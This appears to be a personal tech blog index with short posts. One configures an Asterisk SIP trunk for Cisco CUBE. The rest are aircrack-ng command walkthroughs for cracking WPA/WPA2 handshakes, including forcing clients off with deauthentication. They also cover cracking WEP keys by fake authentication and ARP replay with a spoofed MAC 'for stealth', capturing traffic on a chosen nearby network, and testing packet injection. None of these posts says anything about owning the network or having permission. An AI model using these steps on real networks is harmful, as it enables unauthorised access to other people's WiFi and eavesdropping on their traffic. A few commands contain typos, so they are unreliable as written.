Mar 19
TomNetworking
As far as I can tell Cisco CUBE only supports unauthenticated SIP trunks, which isn’t too much trouble for Asterisk.
In sip.conf:
type=peer
host=x.x.x.x
context=trunks-inbound
allow=all
insecure=invite,port
trustrpid=yes
sendrpid=no
qualify=yes
(change ‘trunks-inbound’ to the necessary context)
In extensions.conf:
exten=>_0.,1,Set(CALLERID(num)=nnn-nnn-${CALLERID(num)})
exten=>_0.,n,Dial(SIP/x.x.x.x/${EXTEN:1})
exten=>_0.,n,Hangup
(First line is optional, and simply adds a prefix to the outgoing caller ID)
The “insecure=invite,port” is the critical part, as the source port from the Cisco CUBE appears to be dynamic unlike a tradition SIP trunk.
Mar 19
TomLinux General, Networking, Wireless
WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
- Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
- Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay –deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 –ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
- Apply brute force: aircrack-ng -w password.lst capturefile.cap
- The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
- Stop monitor mode: airmon-ng stop mon0
Mar 19
TomLinux General, Networking, Wireless
Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID, SSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
- Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
- aireplay-ng –fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 –ignore-negative-one mon0
- aireplay-ng –arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 –ignore-negative-one -e SSID mon0
- when this sees an ARP packet, it will go like crazy injecting packets and you will see the “#Data” rapidly increasing in the airodump-ng window
- After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
- The WEP key should then be displayed in the terminal window.
- The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
- Exit monitor mode: airmon-ng stop mon0
Mar 17
TomLinux General, Networking, Wireless
This is easier and more effective than packet sniffing on a wired network:
- Set your WiFi card into monitoring mode: airmon-ng start wlan0
- See what’s around: airodump-ng mon0
- Select a target network, and note the BSSID value and channel (used as ‘-c’ option below)
- Collect the packet trace: airodump-ng -c 6 –bssid 00:12:34:56:78:90 -w output-file mon0
- Examine packet trace: wireshare output-file.cap
(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)
Mar 17
TomLinux General, Networking, Wireless
Very simple way to test if your WiFi card supports injection:
Put the card in monitor mode: airmod-ng start wlan0
Test using: aireplay-ng -9 mon0
With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!
I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000
Older Entries